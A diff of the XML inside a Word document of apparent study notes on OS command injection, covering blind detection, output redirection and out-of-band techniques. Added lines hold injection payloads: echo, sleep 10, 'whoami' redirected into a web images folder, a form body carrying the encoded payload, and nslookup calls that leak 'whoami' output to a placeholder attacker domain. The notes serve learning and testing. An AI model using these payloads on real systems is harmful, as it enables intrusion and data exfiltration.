--- a/cmd_injection.docx
+++ b/cmd_injection.docx
@@ -638,86 +638,99 @@
         </w:rPr>
         <w:t xml:space="preserve">Ref: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId3">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
-            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Times New Roman" w:cs="Arial"/>
-            <w:b w:val="false"/>
-            <w:bCs w:val="false"/>
-            <w:color w:val="DD0000"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-            <w:lang w:eastAsia="en-IN"/>
-          </w:rPr>
-          <w:t>https://www.scribd.com/document/2530476/Php-Endangers-Remote-Code-Execution</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="InternetLink"/>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="DD0000"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="en-IN"/>
+        </w:rPr>
+        <w:t>https://www.scribd.com/document/2530476/Php-Endangers-Remote-Code-Execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
       </w:r>
       <w:r>
         <w:br w:type="page"/>
@@ -757,60 +770,53 @@
         <w:ind w:left="0" w:hanging="0"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
           <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&amp; echo aiwefwlguh &amp;    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
-          <w:b w:val="false"/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>&amp; echo aiwefwlguh &amp;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:outlineLvl w:val="1"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
-          <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
-          <w:b w:val="false"/>
+          <w:b/>
           <w:bCs/>
           <w:i w:val="false"/>
           <w:caps w:val="false"/>
@@ -1262,64 +1268,29 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
-          <w:b w:val="false"/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
           <w:rFonts w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans"/>
           <w:kern w:val="0"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
-          <w:b w:val="false"/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
-          <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:caps w:val="false"/>
           <w:smallCaps w:val="false"/>
@@ -1375,7 +1346,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
+          <w:rFonts w:cs="" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
           <w:b w:val="false"/>
           <w:bCs/>
           <w:i w:val="false"/>
@@ -1394,7 +1365,7 @@
         <w:pStyle w:val="Normal"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="3"/>
         </w:numPr>
         <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
         <w:outlineLvl w:val="1"/>
@@ -1404,45 +1375,60 @@
       <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:cstheme="minorBidi"/>
-          <w:b w:val="false"/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-        <w:t>Exploiting blind OS command injection by redirecting output</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
-          <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:rFonts w:cs="" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:cstheme="minorBidi"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploiting blind OS command injection by redirecting output </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:cstheme="minorBidi"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>and do url encoding via ctrl+u</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cs="" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
           <w:b w:val="false"/>
           <w:bCs/>
           <w:i w:val="false"/>
@@ -1456,7 +1442,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
           <w:b w:val="false"/>
           <w:bCs/>
           <w:i w:val="false"/>
@@ -1481,21 +1467,22 @@
         <w:ind w:left="0" w:hanging="0"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
-          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
-          <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cs="" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
           <w:b w:val="false"/>
           <w:bCs/>
           <w:i w:val="false"/>
@@ -1521,21 +1508,22 @@
         <w:ind w:left="0" w:hanging="0"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
-          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
-          <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cs="" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
           <w:b w:val="false"/>
           <w:bCs/>
           <w:i w:val="false"/>
@@ -1547,8 +1535,24 @@
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="__DdeLink__102_3889686513"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>&amp; sleep 10 #</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1591,30 +1595,789 @@
         <w:ind w:left="0" w:hanging="0"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>asdf&amp; whoami &gt;/var/www/images/6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.jpg &amp;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>csrf=g2HThtIMoZXUbzyPKPRnLx066gEFKLV6&amp;name=asdf&amp;email=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>asdf%26+whoami+&gt;/var/www/images/62.jpg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>+%26&amp;subject=a&amp;message=asd</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">OAST detection </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
+          <w:b w:val="false"/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>out-of-band interaction</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>This is not detectable by above command / tricks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>&amp; nslookup kgji2ohoyw.web-attacker.com &amp;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Or</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>&amp; nslookup</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
           <w:b w:val="false"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
-          <w:b w:val="false"/>
-          <w:bCs/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> `whoami`.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>kgji2ohoyw.web-attacker.com &amp;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
